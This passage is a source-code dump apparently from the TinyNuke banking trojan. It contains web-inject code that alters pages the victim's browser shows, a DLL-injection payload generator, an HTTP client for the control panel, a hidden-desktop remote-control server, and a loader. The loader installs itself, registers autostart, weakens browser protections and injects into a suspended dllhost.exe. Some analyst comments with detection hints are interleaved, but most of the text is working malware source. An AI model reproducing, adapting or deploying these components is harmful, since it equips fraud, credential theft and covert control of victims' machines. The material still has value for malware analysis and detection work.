WildCardStrCmp(url->data.string, host, TRUE, TRUE)) && 90 | (!path || WildCardStrCmp(uri->data.string, path, TRUE, TRUE))) 91 | { 92 | return code->data.array; 93 | } 94 | next: 95 | curr = curr->next; 96 | } 97 | return NULL; 98 | } 99 | 100 | /* Applies every rule in `injects` to the page held in *buffer: for each object that has string fields "code", "before" and "after", calls ReplaceBeforeAfter(buffer, code, before, after). Entries missing any of the three fields are skipped; nothing happens when injects or buffer is NULL. This is the step that alters page content seen by the user, so a rendered page differing from what the server sent is the visible effect. */ void ReplaceWebInjects(char **buffer, AiList *injects) 101 | { 102 | if(!injects || !buffer) 103 | return; 104 | AiListNode *curr = injects->first; 105 | while(curr) 106 | { 107 | AiJsonValue *object = (AiJsonValue *) curr->data; 108 | if(object->type != AI_JSON_OBJECT) 109 | goto next; 110 | 111 | AiJsonValue *replace = AiJsonGetValueObject(object->data.object, "code"); 112 | if(!replace || replace->type != AI_JSON_STRING) 113 | goto next; 114 | 115 | AiJsonValue *before = AiJsonGetValueObject(object->data.object, "before"); 116 | if(!before || before->type != AI_JSON_STRING) 117 | goto next; 118 | 119 | AiJsonValue *after = AiJsonGetValueObject(object->data.object, "after"); 120 | if(!after || after->type != AI_JSON_STRING) 121 | goto next; 122 | 123 | ReplaceBeforeAfter(buffer, replace->data.string, before->data.string, after->data.string); 124 | next: 125 | curr = curr->next; 126 | } 127 | } -------------------------------------------------------------------------------- /Bot/WebInjects.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include "..\Common.h" 3 | #include "..\Panel.h" 4 | #include "..\AiJson\AiJson.h" 5 | 6 | void LoadWebInjects(); 7 | AiList *GetWebInject(char *host, char *path); 8 | void ReplaceWebInjects(char **buffer, AiList *injects); 9 | BOOL UrlIsBlacklisted(char *url); -------------------------------------------------------------------------------- /Common.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #define SECURITY_WIN32 3 | #pragma warning(disable: 4267) 4 | #pragma warning(disable: 4244) 5 | #pragma warning(disable: 4533) 6 | #include 7 | #include 8 | #include 9 | #include 10 |
#include 11 | #include 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include "Api.h" 18 | #include "Utils.h" 19 | #include "Inject.h" 20 | #include "HTTP.h" 21 | #include "Panel.h" 22 | 23 | #define HOST Strs::host 24 | #define PATH Strs::path 25 | #define PORT 80 26 | #define POLL 60000 -------------------------------------------------------------------------------- /CreateDllInjectPayload/CreateDllInjectPayload.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | typedef struct _LSA_UNICODE_STRING 5 | { 6 | USHORT Length; 7 | USHORT MaximumLength; 8 | PWSTR Buffer; 9 | } LSA_UNICODE_STRING, *PLSA_UNICODE_STRING, UNICODE_STRING, *PUNICODE_STRING; 10 | 11 | typedef struct _STRING { 12 | USHORT Length; 13 | USHORT MaximumLength; 14 | PCHAR Buffer; 15 | } ANSI_STRING, *PANSI_STRING; 16 | 17 | typedef NTSTATUS (NTAPI *T_LdrLoadDll) (PWCHAR PathToFile, 18 | ULONG Flags, 19 | PUNICODE_STRING ModuleFileName, 20 | PHANDLE ModuleHandle); 21 | 22 | typedef NTSTATUS (NTAPI *T_LdrGetProcedureAddress) (HMODULE ModuleHandle, 23 | PANSI_STRING FunctionName, 24 | WORD Oridinal, 25 | PVOID *FunctionAddress); 26 | 27 | typedef VOID (NTAPI *T_RtlInitAnsiString) (PANSI_STRING DestinationString, PCHAR SourceString); 28 | 29 | typedef NTSTATUS (NTAPI *T_RtlAnsiStringToUnicodeString) (PUNICODE_STRING DestinationString, 30 | PANSI_STRING SourceString, 31 | BOOLEAN AllocateDestinationString); 32 | 33 | typedef VOID (NTAPI *T_RtlFreeUnicodeString) (PUNICODE_STRING UnicodeString); 34 | 35 | struct InjectData 36 | { 37 | BYTE *base; 38 | IMAGE_BASE_RELOCATION *baseRelocation; 39 | IMAGE_IMPORT_DESCRIPTOR *importDesc; 40 | T_RtlInitAnsiString pRtlInitAnsiString; 41 | T_RtlAnsiStringToUnicodeString pRtlAnsiStringToUnicodeString; 42 | T_LdrLoadDll pLdrLoadDll; 43 | T_LdrGetProcedureAddress pLdrGetProcedureAddress; 44 | T_RtlFreeUnicodeString pRtlFreeUnicodeString; 45 | }; 46 | 47 | typedef BOOL 
(WINAPI *T_DllMain) (HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved); 48 | 49 | DWORD WINAPI Payload(InjectData *injectData) 50 | { 51 | IMAGE_DOS_HEADER *dosHeader = (IMAGE_DOS_HEADER *) injectData->base; 52 | IMAGE_NT_HEADERS *ntHeaders = (IMAGE_NT_HEADERS *) (injectData->base + dosHeader->e_lfanew); 53 | IMAGE_BASE_RELOCATION *baseRelocation = (IMAGE_BASE_RELOCATION *) injectData->baseRelocation; 54 | 55 | size_t delta = (size_t) injectData->base - ntHeaders->OptionalHeader.ImageBase; 56 | 57 | while(baseRelocation->VirtualAddress) 58 | { 59 | if(baseRelocation->SizeOfBlock >= sizeof(IMAGE_BASE_RELOCATION)) 60 | { 61 | DWORD count = (baseRelocation->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) / sizeof(WORD); 62 | WORD *pWord = (WORD *) (baseRelocation + 1); 63 | 64 | for(DWORD i = 0; i < count; ++i) 65 | { 66 | DWORD type = pWord[i] >> 12; 67 | DWORD offset = pWord[i] & 0xfff; 68 | 69 | switch(type) 70 | { 71 | case IMAGE_REL_BASED_HIGHLOW: 72 | { 73 | DWORD *patchAddress; 74 | 75 | patchAddress = (DWORD *) (((DWORD) injectData->base) + baseRelocation->VirtualAddress + offset); 76 | *patchAddress += (DWORD) delta; 77 | break; 78 | } 79 | case IMAGE_REL_BASED_DIR64: 80 | { 81 | DWORD64 *patchAddress; 82 | 83 | patchAddress = (DWORD64 *) (((DWORD64) injectData->base) + baseRelocation->VirtualAddress + offset); 84 | *patchAddress += (DWORD64) delta; 85 | break; 86 | } 87 | } 88 | } 89 | } 90 | baseRelocation = (IMAGE_BASE_RELOCATION *) ((BYTE *) baseRelocation + baseRelocation->SizeOfBlock); 91 | } 92 | 93 | IMAGE_IMPORT_DESCRIPTOR *importDesc = (IMAGE_IMPORT_DESCRIPTOR *) injectData->importDesc; 94 | 95 | while(importDesc->Name) 96 | { 97 | ANSI_STRING aDllStr; 98 | injectData->pRtlInitAnsiString(&aDllStr, (char *) ((BYTE *) injectData->base + importDesc->Name)); 99 | 100 | UNICODE_STRING uDllStr; 101 | injectData->pRtlAnsiStringToUnicodeString(&uDllStr, &aDllStr, TRUE); 102 | 103 | HANDLE hModule; 104 | injectData->pLdrLoadDll(NULL, NULL, &uDllStr, 
&hModule); 105 | injectData->pRtlFreeUnicodeString(&uDllStr); 106 | 107 | IMAGE_THUNK_DATA *origThunkData = (IMAGE_THUNK_DATA *) ((BYTE *) injectData->base + importDesc->OriginalFirstThunk); 108 | IMAGE_THUNK_DATA *firstThunkData = (IMAGE_THUNK_DATA *) ((BYTE *) injectData->base + importDesc->FirstThunk); 109 | 110 | while(origThunkData->u1.AddressOfData) 111 | { 112 | ANSI_STRING aFuncStr; 113 | 114 | if(origThunkData->u1.Ordinal & IMAGE_ORDINAL_FLAG) 115 | injectData->pRtlInitAnsiString(&aFuncStr, (char *) (origThunkData->u1.Ordinal & 0xFFFF)); 116 | else 117 | { 118 | IMAGE_IMPORT_BY_NAME *importByName = (IMAGE_IMPORT_BY_NAME *) ((BYTE *) injectData->base + origThunkData->u1.AddressOfData); 119 | injectData->pRtlInitAnsiString(&aFuncStr, importByName->Name); 120 | } 121 | 122 | PVOID func; 123 | injectData->pLdrGetProcedureAddress((HMODULE) hModule, &aFuncStr, NULL, &func); 124 | firstThunkData->u1.Function = (size_t) func; 125 | 126 | ++origThunkData; 127 | ++firstThunkData; 128 | } 129 | ++importDesc; 130 | } 131 | 132 | T_DllMain pDllMain = (T_DllMain) ((BYTE *) injectData->base + ntHeaders->OptionalHeader.AddressOfEntryPoint); 133 | pDllMain((HMODULE) injectData->base, DLL_PROCESS_ATTACH, NULL); 134 | return 0; 135 | 136 | } 137 | 138 | void AfterPayload() { } 139 | 140 | int main(int argc, char **argv) 141 | { 142 | BYTE *func = (BYTE *) Payload; 143 | DWORD funcSize = (DWORD) AfterPayload - (DWORD) Payload; 144 | 145 | FILE *file = fopen("out.txt", "w"); 146 | fprintf(file, "DWORD payloadSize = %d;\n", funcSize); 147 | 148 | fputs("BYTE payload[] = { ", file); 149 | for(DWORD i = 0; i < funcSize; ++i) 150 | fprintf(file, "0x%02x, ", func[i]); 151 | fputs("};", file); 152 | } -------------------------------------------------------------------------------- /HTTP.cpp: -------------------------------------------------------------------------------- 1 | #include "HTTP.h" 2 | 3 | BOOL HttpSubmitRequest(HttpRequestData &httpRequestData) 4 | { 5 | BOOL ret = 
FALSE; 6 | WSADATA wsa; 7 | SOCKET s; 8 | 9 | char request[1024] = { 0 }; 10 | 11 | httpRequestData.outputBodySize = 0; 12 | Funcs::pLstrcpyA(request, (httpRequestData.post ? Strs::postSpace : Strs::getSpace)); 13 | Funcs::pLstrcatA(request, httpRequestData.path); 14 | Funcs::pLstrcatA(request, Strs::httpReq1); 15 | Funcs::pLstrcatA(request, Strs::httpReq2); 16 | Funcs::pLstrcatA(request, httpRequestData.host); 17 | Funcs::pLstrcatA(request, Strs::httpReq3); 18 | 19 | if(httpRequestData.post && httpRequestData.inputBody) 20 | { 21 | Funcs::pLstrcatA(request, Strs::httpReq4); 22 | char sizeStr[10]; 23 | Funcs::pWsprintfA(sizeStr, Strs::sprintfIntEscape, httpRequestData.inputBodySize); 24 | Funcs::pLstrcatA(request, sizeStr); 25 | Funcs::pLstrcatA(request, Strs::winNewLine); 26 | } 27 | Funcs::pLstrcatA(request, Strs::winNewLine); 28 | 29 | if(Funcs::pWSAStartup(MAKEWORD(2, 2), &wsa) != 0) 30 | goto exit; 31 | 32 | if((s = Funcs::pSocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) 33 | goto exit; 34 | 35 | hostent *he = Funcs::pGethostbyname(httpRequestData.host); 36 | if(!he) 37 | goto exit; 38 | 39 | struct sockaddr_in addr; 40 | Funcs::pMemcpy(&addr.sin_addr, he->h_addr_list[0], he->h_length); 41 | addr.sin_family = AF_INET; 42 | addr.sin_port = Funcs::pHtons(httpRequestData.port); 43 | 44 | if(Funcs::pConnect(s, (struct sockaddr *) &addr, sizeof(addr)) == SOCKET_ERROR) 45 | goto exit; 46 | if(Funcs::pSend(s, request, Funcs::pLstrlenA(request), 0) <= 0) 47 | goto exit; 48 | 49 | if(httpRequestData.inputBody) 50 | { 51 | if(Funcs::pSend(s, (char *) httpRequestData.inputBody, httpRequestData.inputBodySize, 0) <= 0) 52 | goto exit; 53 | } 54 | 55 | char header[1024] = { 0 }; 56 | int contentLength = -1; 57 | int lastPos = 0; 58 | BOOL firstLine = TRUE; 59 | BOOL transferChunked = FALSE; 60 | 61 | for(int i = 0;; ++i) 62 | { 63 | if(i > sizeof(header) - 1) 64 | goto exit; 65 | if(Funcs::pRecv(s, header + i, 1, 0) <= 0) 66 | goto exit; 67 | if(i > 0 && 
header[i - 1] == '\r' && header[i] == '\n') 68 | { 69 | header[i - 1] = 0; 70 | if(firstLine) 71 | { 72 | if(Funcs::pLstrcmpiA(header, Strs::httpReq5)) 73 | goto exit; 74 | firstLine = FALSE; 75 | } 76 | else 77 | { 78 | char *field = header + lastPos + 2; 79 | if(Funcs::pLstrlenA(field) == 0) 80 | { 81 | if(contentLength < 0 && !transferChunked) 82 | goto exit; 83 | break; 84 | } 85 | char *name; 86 | char *value; 87 | if((value = (char *) Funcs::pStrStrA(field, Strs::httpReq6))) 88 | { 89 | name = field; 90 | name[value - field] = 0; 91 | value += 2; 92 | if(!Funcs::pLstrcmpiA(name, Strs::httpReq7)) 93 | { 94 | char *endPtr; 95 | contentLength = Funcs::pStrtol(value, &endPtr, 10); 96 | if(endPtr == value) 97 | goto exit; 98 | if(value < 0) 99 | goto exit; 100 | } 101 | else if(!Funcs::pLstrcmpiA(name, Strs::httpReq8)) 102 | { 103 | if(!Funcs::pLstrcmpiA(value, Strs::httpReq9)) 104 | transferChunked = TRUE; 105 | } 106 | value += 2; 107 | } 108 | } 109 | lastPos = i - 1; 110 | } 111 | } 112 | if(transferChunked) 113 | { 114 | const int reallocSize = 16394; 115 | 116 | char sizeStr[10] = { 0 }; 117 | int allocatedSize = reallocSize; 118 | int read = 0; 119 | 120 | httpRequestData.outputBody = (BYTE *) Alloc(reallocSize); 121 | for(int i = 0;;) 122 | { 123 | if(i > sizeof(sizeStr) - 1) 124 | goto exit; 125 | if(Funcs::pRecv(s, sizeStr + i, 1, 0) <= 0) 126 | goto exit; 127 | if(i > 0 && sizeStr[i - 1] == '\r' && sizeStr[i] == '\n') 128 | { 129 | sizeStr[i - 1] = 0; 130 | char *endPtr; 131 | int size = Funcs::pStrtol(sizeStr, &endPtr, 16); 132 | if(endPtr == sizeStr) 133 | goto exit; 134 | if(size < 0) 135 | goto exit; 136 | if(size == 0) 137 | { 138 | httpRequestData.outputBody[httpRequestData.outputBodySize] = 0; 139 | break; 140 | } 141 | httpRequestData.outputBodySize += size; 142 | if(allocatedSize < httpRequestData.outputBodySize + 1) 143 | { 144 | allocatedSize += httpRequestData.outputBodySize + reallocSize; 145 | httpRequestData.outputBody = (BYTE *) 
ReAlloc(httpRequestData.outputBody, allocatedSize); 146 | } 147 | int chunkRead = 0; 148 | do 149 | { 150 | int read2 = Funcs::pRecv(s, (char *) httpRequestData.outputBody + read + chunkRead, size - chunkRead, 0); 151 | if(read2 <= 0) 152 | goto exit; 153 | chunkRead += read2; 154 | } while(chunkRead != size); 155 | if(Funcs::pRecv(s, sizeStr, 2, 0) <= 0) 156 | goto exit; 157 | read += size; 158 | i = 0; 159 | continue; 160 | } 161 | ++i; 162 | } 163 | } 164 | else 165 | { 166 | if(contentLength > 0) 167 | { 168 | httpRequestData.outputBody = (BYTE *) Alloc(contentLength + 1); 169 | httpRequestData.outputBodySize = contentLength; 170 | httpRequestData.outputBody[httpRequestData.outputBodySize] = 0; 171 | int totalRead = 0; 172 | do 173 | { 174 | int read = Funcs::pRecv(s, (char *) httpRequestData.outputBody + totalRead, contentLength - totalRead, 0); 175 | if(read <= 0) goto exit; 176 | totalRead += read; 177 | } 178 | while(totalRead != contentLength); 179 | } 180 | else 181 | { 182 | httpRequestData.outputBody = (BYTE *) Alloc(1); 183 | httpRequestData.outputBody[0] = 0; 184 | } 185 | } 186 | ret = TRUE; 187 | exit: 188 | if(!ret) 189 | { 190 | httpRequestData.outputBody = NULL; 191 | Funcs::pFree(httpRequestData.outputBody); 192 | } 193 | Funcs::pClosesocket(s); 194 | Funcs::pWSACleanup(); 195 | return ret; 196 | } -------------------------------------------------------------------------------- /HTTP.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include "Common.h" 3 | 4 | struct HttpRequestData 5 | { 6 | BOOL post; 7 | int port; 8 | char *host; 9 | char *path; 10 | BYTE *inputBody; 11 | int inputBodySize; 12 | BYTE *outputBody; 13 | int outputBodySize; 14 | }; 15 | 16 | BOOL HttpSubmitRequest(HttpRequestData &httpRequestData); -------------------------------------------------------------------------------- /HiddenDesktop/HiddenDesktop.sdf: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/rossja/TinyNuke/c1e04c36d3aa2dbd70fcb17063809798b00b1fcf/HiddenDesktop/HiddenDesktop.sdf -------------------------------------------------------------------------------- /HiddenDesktop/HiddenDesktop.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 2012 4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Server", "Server\Server.vcxproj", "{5C3AD9AC-C62C-4AA8-BAE2-9AF920A652E3}" 5 | EndProject 6 | Global 7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 8 | Debug|Win32 = Debug|Win32 9 | Release|Win32 = Release|Win32 10 | EndGlobalSection 11 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 12 | {5C3AD9AC-C62C-4AA8-BAE2-9AF920A652E3}.Debug|Win32.ActiveCfg = Debug|Win32 13 | {5C3AD9AC-C62C-4AA8-BAE2-9AF920A652E3}.Debug|Win32.Build.0 = Debug|Win32 14 | {5C3AD9AC-C62C-4AA8-BAE2-9AF920A652E3}.Release|Win32.ActiveCfg = Release|Win32 15 | {5C3AD9AC-C62C-4AA8-BAE2-9AF920A652E3}.Release|Win32.Build.0 = Release|Win32 16 | EndGlobalSection 17 | GlobalSection(SolutionProperties) = preSolution 18 | HideSolutionNode = FALSE 19 | EndGlobalSection 20 | EndGlobal 21 | -------------------------------------------------------------------------------- /HiddenDesktop/HiddenDesktop.v11.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rossja/TinyNuke/c1e04c36d3aa2dbd70fcb17063809798b00b1fcf/HiddenDesktop/HiddenDesktop.v11.suo -------------------------------------------------------------------------------- /HiddenDesktop/Server/Common.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | #pragma comment(lib, "ws2_32.lib") 
-------------------------------------------------------------------------------- /HiddenDesktop/Server/ControlWindow.cpp: -------------------------------------------------------------------------------- 1 | #include "ControlWindow.h" 2 | 3 | static const TCHAR *className = TEXT("HiddenDesktop_ControlWindow"); 4 | static const TCHAR *titlePattern = TEXT("%S Hidden Desktop"); 5 | 6 | BOOL CW_Register(WNDPROC lpfnWndProc) 7 | { 8 | WNDCLASSEX wndClass; 9 | wndClass.cbSize = sizeof(WNDCLASSEX); 10 | wndClass.style = CS_DBLCLKS; 11 | wndClass.lpfnWndProc = lpfnWndProc; 12 | wndClass.cbClsExtra = 0; 13 | wndClass.cbWndExtra = 0; 14 | wndClass.hInstance = NULL; 15 | wndClass.hIcon = LoadIcon(NULL, IDI_APPLICATION); 16 | wndClass.hCursor = LoadCursor(NULL, IDC_ARROW); 17 | wndClass.hbrBackground = (HBRUSH) COLOR_WINDOW; 18 | wndClass.lpszMenuName = NULL; 19 | wndClass.lpszClassName = className; 20 | wndClass.hIconSm = LoadIcon(NULL, IDI_APPLICATION); 21 | return RegisterClassEx(&wndClass); 22 | } 23 | 24 | HWND CW_Create(DWORD uhid, DWORD width, DWORD height) 25 | { 26 | TCHAR title[100]; 27 | IN_ADDR addr; 28 | addr.S_un.S_addr = uhid; 29 | 30 | wsprintf(title, titlePattern, inet_ntoa(addr)); 31 | 32 | HWND hWnd = CreateWindow(className, 33 | title, 34 | WS_MAXIMIZEBOX | WS_MINIMIZEBOX | WS_SIZEBOX | WS_SYSMENU, 35 | CW_USEDEFAULT, 36 | CW_USEDEFAULT, 37 | width, 38 | height, 39 | NULL, 40 | NULL, 41 | GetModuleHandle(NULL), 42 | NULL); 43 | 44 | if(hWnd == NULL) 45 | return NULL; 46 | 47 | ShowWindow(hWnd, SW_SHOW); 48 | return hWnd; 49 | } -------------------------------------------------------------------------------- /HiddenDesktop/Server/ControlWindow.h: -------------------------------------------------------------------------------- 1 | #include "Common.h" 2 | 3 | BOOL CW_Register(WNDPROC lpfnWndProc); 4 | HWND CW_Create(DWORD uhid, DWORD width, DWORD height); -------------------------------------------------------------------------------- 
/HiddenDesktop/Server/Main.cpp: -------------------------------------------------------------------------------- 1 | #include "Common.h" 2 | #include "ControlWindow.h" 3 | #include "Server.h" 4 | 5 | #define majVer 1 6 | #define minVer 0 7 | 8 | int CALLBACK WinMain(HINSTANCE hInstance, 9 | HINSTANCE hPrevInstance, 10 | LPSTR lpCmdLine, 11 | int nCmdShow) 12 | { 13 | AllocConsole(); 14 | 15 | freopen("CONIN$", "r", stdin); 16 | freopen("CONOUT$", "w", stdout); 17 | freopen("CONOUT$", "w", stderr); 18 | 19 | SetConsoleTitle(TEXT("Hidden Desktop")); 20 | 21 | wprintf(TEXT("Version: %d.%d\n"), majVer, minVer); 22 | wprintf(TEXT("Compiled: %S @ %S\n"), __DATE__, __TIME__); 23 | 24 | if(!StartServer(atoi(lpCmdLine))) 25 | { 26 | wprintf(TEXT("Could not start the server (Error: %d)\n"), WSAGetLastError()); 27 | getchar(); 28 | return 0; 29 | } 30 | return 0; 31 | } -------------------------------------------------------------------------------- /HiddenDesktop/Server/Server.h: -------------------------------------------------------------------------------- 1 | #include "Common.h" 2 | #include "ControlWindow.h" 3 | 4 | BOOL StartServer(int port); -------------------------------------------------------------------------------- /HiddenDesktop/Server/Server.vcxproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | 14 | {5C3AD9AC-C62C-4AA8-BAE2-9AF920A652E3} 15 | Win32Proj 16 | Server 17 | 18 | 19 | 20 | Application 21 | true 22 | v110 23 | Unicode 24 | 25 | 26 | Application 27 | false 28 | v110_xp 29 | true 30 | Unicode 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | true 44 | 45 | 46 | false 47 | 48 | 49 | 50 | 51 | 52 | Level3 53 | Disabled 54 | WIN32;_DEBUG;_WINDOWS;%(PreprocessorDefinitions) 55 | 56 | 57 | Windows 58 | true 59 | 60 | 61 | 62 | 63 | Level3 64 | 65 | 66 | MaxSpeed 67 | true 68 | true 69 | 
WIN32;NDEBUG;_WINDOWS;%(PreprocessorDefinitions) 70 | MultiThreaded 71 | 72 | 73 | Windows 74 | true 75 | true 76 | true 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | -------------------------------------------------------------------------------- /HiddenDesktop/Server/Server.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | Source Files 23 | 24 | 25 | Source Files 26 | 27 | 28 | 29 | 30 | Header Files 31 | 32 | 33 | Header Files 34 | 35 | 36 | Header Files 37 | 38 | 39 | -------------------------------------------------------------------------------- /HiddenDesktop/Server/Server.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 6667 5 | WindowsLocalDebugger 6 | 7 | 8 | 6667 9 | WindowsLocalDebugger 10 | 11 | -------------------------------------------------------------------------------- /HiddenDesktop/readme.txt: -------------------------------------------------------------------------------- 1 | This does not use the VNC protocol but is still called VNC in the panel because it is the same thing as the zeus HVNC -------------------------------------------------------------------------------- /Inject.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include "Common.h" 3 | 4 | BOOL InjectDll(BYTE *dllBuffer, HANDLE hProcess, BOOL x64); -------------------------------------------------------------------------------- /Loader/Loader.vcxproj.filters: 
-------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | {d8534896-e1f2-4da7-b799-d39f1f2a9e08} 18 | 19 | 20 | {ead81735-1c50-40c8-bcb3-03d2e223befe} 21 | 22 | 23 | 24 | 25 | Source Files 26 | 27 | 28 | Source Files 29 | 30 | 31 | Source Files 32 | 33 | 34 | Source Files 35 | 36 | 37 | Source Files 38 | 39 | 40 | Source Files 41 | 42 | 43 | 44 | 45 | Header Files 46 | 47 | 48 | Header Files 49 | 50 | 51 | Header Files 52 | 53 | 54 | Header Files 55 | 56 | 57 | Header Files 58 | 59 | 60 | Header Files 61 | 62 | 63 | Header Files\wow64ext 64 | 65 | 66 | Header Files\wow64ext 67 | 68 | 69 | Header Files\wow64ext 70 | 71 | 72 | Header Files\wow64ext 73 | 74 | 75 | -------------------------------------------------------------------------------- /Loader/Loader.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | -------------------------------------------------------------------------------- /Loader/Main.cpp: -------------------------------------------------------------------------------- 1 | #pragma comment(linker, "/ENTRY:Entry") 2 | 3 | #include "..\Common.h" 4 | 5 | #define RUN_DEBUG FALSE 6 | 7 | /* Install: first-run path, reached from Entry with the running executable's own path. Writes that path string into a file whose name is produced by GetTempPathBotPrefix (helper not shown; presumably a bot-specific name under the temp directory), copies the executable to the location returned by GetInstallPath, passes the copy to SetStartupValue (presumably autostart registration - confirm in Utils) and starts the copy as a new process. Artifacts for responders: the marker file holding the original executable path, the copied executable, and a process started from the install location. The "melt" marker is presumably read later to delete the original file - not visible here. */ static void Install(char *path) 8 | { 9 | //melt 10 | char temp[MAX_PATH]; 11 | GetTempPathBotPrefix(temp); 12 | HANDLE hFile = Funcs::pCreateFileA 13 | ( 14 | temp, 15 | GENERIC_WRITE, 16 | 0, 17 | NULL, 18 | CREATE_ALWAYS, 19 | FILE_ATTRIBUTE_NORMAL, 20 | NULL 21 | ); 22 | DWORD written; 23 | Funcs::pWriteFile(hFile, path, Funcs::pLstrlenA(path), &written, NULL); 24 | Funcs::pCloseHandle(hFile); 25 | //end melt 26 | 27 | char installPath[MAX_PATH] = 
{ 0 }; 28 | GetInstallPath(installPath); 29 | Funcs::pCopyFileA(path, installPath, FALSE); 30 | SetStartupValue(installPath); 31 | 32 | STARTUPINFOA startupInfo = { 0 }; 33 | PROCESS_INFORMATION processInfo = { 0 }; 34 | 35 | startupInfo.cb = sizeof(startupInfo); 36 | 37 | Funcs::pCreateProcessA(installPath, NULL, NULL, NULL, FALSE, 0, NULL, NULL, &startupInfo, &processInfo); 38 | } 39 | 40 | /* Run: path taken when the image already runs under its installed name. Calls SetFirefoxPrefs and DisableMultiProcessesAndProtectedModeIe (browser configuration changes; bodies not shown), initialises panel communication, obtains the main plugin image through GetDlls, then builds a path from the CSIDL_SYSTEM folder plus Strs::fileDiv and Strs::dllhostExe (assumed to be the path separator and the dllhost.exe file name, as the identifiers suggest). That program is started with CREATE_SUSPENDED and a NULL command line, and its process handle is handed to InjectDll together with the plugin image, with the x64 argument FALSE. Detection: a dllhost.exe instance without the usual command-line arguments, created suspended by a parent outside the system directories. */ static void Run() 41 | { 42 | SetFirefoxPrefs(); 43 | DisableMultiProcessesAndProtectedModeIe(); 44 | InitPanelRequest(); 45 | BYTE *mainPluginPe = NULL; 46 | 47 | GetDlls(&mainPluginPe, NULL, FALSE); 48 | 49 | char dllhostPath[MAX_PATH] = { 0 }; 50 | 51 | Funcs::pSHGetFolderPathA(NULL, CSIDL_SYSTEM, NULL, 0, dllhostPath); 52 | 53 | Funcs::pLstrcatA(dllhostPath, Strs::fileDiv); 54 | Funcs::pLstrcatA(dllhostPath, Strs::dllhostExe); 55 | 56 | STARTUPINFOA startupInfo = { 0 }; 57 | PROCESS_INFORMATION processInfo = { 0 }; 58 | 59 | startupInfo.cb = sizeof(startupInfo); 60 | 61 | Funcs::pCreateProcessA(dllhostPath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &startupInfo, &processInfo); 62 | InjectDll(mainPluginPe, processInfo.hProcess, FALSE); 63 | } 64 | 65 | /* Entry: custom entry point named by the /ENTRY linker pragma at the top of the file. After InitApi it derives a bot id (GetBotId, not shown) and creates a mutex with that name; if the mutex already exists the process exits, otherwise the mutex is released and closed straight away. With RUN_DEBUG unset, the bot id is compared with the beginning of the executable's file name: a mismatch leads to Install, a match to Run; the process then exits. Hunting hint: the same bot id value shows up as a mutex name and as the prefix of the installed file name. */ void Entry() 66 | { 67 | InitApi(); 68 | char botId [BOT_ID_LEN] = { 0 }; 69 | char exePath[MAX_PATH] = { 0 }; 70 | char *exeName; 71 | GetBotId(botId); 72 | HANDLE hMutex = Funcs::pCreateMutexA(NULL, TRUE, botId); 73 | if(Funcs::pGetLastError() == ERROR_ALREADY_EXISTS) 74 | Funcs::pExitProcess(0); 75 | Funcs::pReleaseMutex(hMutex); 76 | Funcs::pCloseHandle(hMutex); 77 | #if(RUN_DEBUG) 78 | Run(); 79 | #else 80 | Funcs::pGetModuleFileNameA(NULL, exePath, MAX_PATH); 81 | exeName = Funcs::pPathFindFileNameA(exePath); 82 | if(Funcs::pStrncmp(botId, exeName, Funcs::pLstrlenA(botId)) != 0) 83 | Install(exePath); 84 | else 85 | Run(); 86 | #endif 87 | Funcs::pExitProcess(0); 88 | } -------------------------------------------------------------------------------- /MinHook/include/MinHook.h: 
